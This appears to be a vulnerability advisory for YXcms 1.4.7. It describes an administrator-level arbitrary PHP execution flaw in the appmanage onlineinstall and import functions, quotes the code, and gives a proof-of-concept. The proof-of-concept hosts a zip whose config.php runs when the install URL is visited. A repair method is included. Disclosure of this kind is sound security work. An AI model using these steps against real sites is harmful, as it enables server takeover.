There is an arbitrary PHP code execution security vulnerability in YXcms 1.4.7
Description:
An arbitrary PHP code execution vulnerability in /WWW/YXcmsApp1.4.7/protected/apps/appmanage/controller/indexController.php allows remote attackers to execute arbitrary PHP code.
Condition:
You must be an administrator (for example, an account obtained through a weak password or social engineering).
The Cause of the vulnerability:
There is a vulnerable function at line 203 of this script, as shown in the following code:
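public function onlineinstall(){
    // Remote install: download the archive named by the `url` query parameter
    // into cache/tmp and hand it to import(). The URL is attacker-controlled
    // input even though this action is intended for administrators.
    $url = isset($_GET['url']) ? trim((string) $_GET['url']) : ''; // online install address
    if( empty($url) ){
        $this->error('参数传递错误');
    }
    // file_get_contents() honours every registered stream wrapper (file://,
    // php://, ftp://, data:, ...), so an unrestricted URL can read local files
    // or reach internal hosts. Only plain http(s) locations are accepted.
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    if( !in_array($scheme, array('http', 'https'), true) ){
        $this->error('参数传递错误');
    }
    // NOTE(review): the downloaded archive is still installed, and its PHP
    // executed, without any origin or integrity check; an allowlist of trusted
    // hosts or a signature/checksum check belongs here — confirm with project policy.
    $content = file_get_contents($url);
    if( empty($content) ){
        $this->error('数据下载错误');
    }
    // Temporary file name is derived from the URL, not from its contents.
    $zip_file = BASE_PATH . 'cache/tmp/' .md5($url) .'.zip';
    if( file_put_contents($zip_file, $content) ){
        $this->import($zip_file);
    }else{
        $this->error('数据写入错误');
    }
}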
and this one at line 79 of this script, as shown in the following code:
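public function import($zip_file=''){
    // Install an application from a zip archive. $zip_file is the path of an
    // archive already on disk (used by onlineinstall()); when it is empty the
    // archive is taken from the uploaded `file` form field. Extracting the
    // archive under apps/ and calling install() loads the app's own PHP, so the
    // archive contents run with the web server's privileges — only trusted
    // packages should ever reach this method.
    if(empty($zip_file)){
        if( !$this->isPost() ){
            $this->display();
            return true;
        }
        // The original test (`size < 0`) can never be true. Require a
        // completed upload with a non-empty body and a genuine PHP temp file.
        if( !isset($_FILES['file'])
            || $_FILES['file']['error'] !== UPLOAD_ERR_OK
            || $_FILES['file']['size'] <= 0
            || !is_uploaded_file($_FILES['file']['tmp_name']) ){
            $this->error('请选择文件');
        }
        $zip_file = $_FILES['file']['tmp_name'];
    }
    $zip_dir = BASE_PATH . 'cache/tmp/' .md5($zip_file) .'/';
    if(substr($zip_dir,0,1)=="/") $zip_dir='.'.$zip_dir; // absolute path could not be obtained
    // NOTE(review): whether Zip::decompress() rejects entries whose names
    // contain `..` or absolute paths is not visible here — confirm, since the
    // archive is untrusted.
    $zip = new Zip();
    $zip->decompress($zip_file, $zip_dir);
    @unlink($zip_file); // best effort: the archive is no longer needed
    // Derive the app name from the first */config.php found; the character
    // class keeps the name free of path separators, so it cannot escape apps/.
    $app = '';
    $arr = glob($zip_dir .'*/config.php');
    if( !empty($arr) ){
        if( preg_match('#/([a-z0-9]+)/config.php#', $arr[0], $matches)){
            $app = $matches[1];
        }
    }
    if( empty($app) ){
        del_dir($zip_dir);
        $this->error('安装包格式错误!');
    }
    // Refuse to overwrite an application that is already installed.
    $app_path = BASE_PATH . 'apps/' . $app . '/';
    if( is_dir($app_path) ){
        del_dir($zip_dir);
        $this->error($app .'应用已存在,请先卸载!');
    }
    // Copy the extracted app into the apps directory and clean up.
    copy_dir($zip_dir . $app , $app_path);
    del_dir($zip_dir);
    // Run the installer; install() reads the app name from $_GET['app'].
    $_GET['app'] = $app;
    $this->install();
}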
POC:
First, a zip file is hosted on any website; it contains a folder, and inside that folder a file named 'config.php'.
The archive layout is as follows:
aaa.zip-+----aaa+-----config.php
| |
| +-----
|
+----
Any PHP code placed in this config.php will be executed.
Then visit the link http://127.0.0.1/index.php?r=appmanage/index/onlineinstall&url=http://127.0.0.1/aaa.zip
and the PHP code in config.php is executed shortly afterwards.
Repair method:
Inspect config.php for malicious code before the package is installed. Because installing an application executes its PHP, the installer should also accept archives only from trusted sources and restrict the `url` parameter to http(s) locations.